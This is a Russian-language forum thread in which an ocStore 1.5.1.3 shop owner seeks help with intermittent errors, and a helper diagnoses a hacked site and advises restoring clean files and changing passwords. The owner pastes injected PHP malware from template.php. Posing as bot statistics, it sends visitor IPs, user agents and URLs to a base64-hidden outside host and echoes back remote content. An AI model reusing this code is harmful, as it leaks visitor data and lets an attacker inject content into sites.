Проблема с куками и кодировкой

[maxhit]

Проблема с сайтом началась не так давно, и появилась сама по себе, без каких либо правок. Фото проблемы ниже. Причем выплывает она периодично, и только в браузере Firefox. Исправил путем закомментирования строк на которые он ругается. Я в php не силен. В чем может быть причина? Подскажите пожалуйста

 

Комменты ставил на следующие строки:

 

system/library/session.php

 

//if (!session_id()) {
            //ini_set('session.use_cookies', 'On');
            //ini_set('session.use_trans_sid', 'Off');
            
            //session_set_cookie_params(0, '/');
            //session_start();
        //}
 

system/library/template.php

if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
 

Второй блок кода комменты не хотел ставить. Я ставлю, перезаливаю файл, он вроде перезаливается. Но код остается прежним. Радует что ошибки исчезли.

 

Минус что корзина перестала работать :(

 

[afwollis]

движок? версия? откуда качали?

[maxhit]

Version 1.5.1.3 , качал с офф.сайта, русский опенкард

 

Может вирус какой-то, ведет себя подозрительно...

 

Сейчас разкомменитровал все блоки, и никакой ошибки. :mellow:  Я уже не знаю что и думать

[afwollis]

еще раз:

ДВИЖОК? (opencart / ocStore / другое)

ОТКУДА КАЧАЛИ? (ссылку)

 

в ocStore_1513 в библиотеке template.php всего 26 строк (вместе с пустыми).

[maxhit]

Движок ocStore Version 1.5.1.3. Качал от сюда - https://myopencart.com/. Давно это было.

 

Я вспомнил схожую проблему, она была с момента установки. При заходе в админке в раздел "Модули", получалось вот такое:

 

 

Код в файле template.php довольно странный, похож на заразу :(

 

<?php
final class Template {
	public $data = array();
	
	public function fetch($filename) {
		$file = DIR_TEMPLATE . $filename;
    
		if (file_exists($file)) {
			extract($this->data);
			
      		ob_start();
      
	  		include($file);
      
	  		$content = ob_get_contents();

      		ob_end_clean();

      		return $content;
    	} else {
			trigger_error('Error: Could not load template ' . $file . '!');
			exit();				
    	}	
	}
}
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

[afwollis]

вас похакали.

запросите у хостера логи доступа к ftp.

восстановите файлы магазина из бэкапа.

 

system/* можно вообще из оригинального архива движка восстановить (залить поверх с заменой).

[maxhit]

Ой, как же вовремя вы мне помогли.))) Данные доступа к FTP есть. Просто перезалить папку System? Брать с такой же версии движка? Или можно более новые?

 

Из бэкапа вы имеете ввиду посредством хостинга?

[afwollis]

запросите у хостера логи доступа к ftp.

это надо для анализа ситуации.
также сделайте бэкап файлов магазина для анализа.

= = =

 

Из бэкапа вы имеете ввиду посредством хостинга?

 

да.

 

Просто перезалить папку System? Брать с такой же версии движка? Или можно более новые?

 

только с той же версии.

[maxhit]

Бэкап уже заражен, на серваке хранят в течении 7 дней. :( . Этот код засунут почти во все файлы движка.

 

Я вот подумал, может проше поставить все на свежую и сделать импорт. Реально это?

[afwollis]

если у вас нет изменений - можно оригинальные файлы залить.

но лучше бы вам почистить комп, сменить пароли, слить файлы магазина себе, почистить их локально, залить на хостинг.

[maxhit]

Правильно я понял, если я перезалью по ftp все файлы на оригинал (с последней версии cms) то товары, картинки, страницы останутся прежними?

[afwollis]

если проводились изменения функционала - все "тю-тю".

товары и картинки останутся.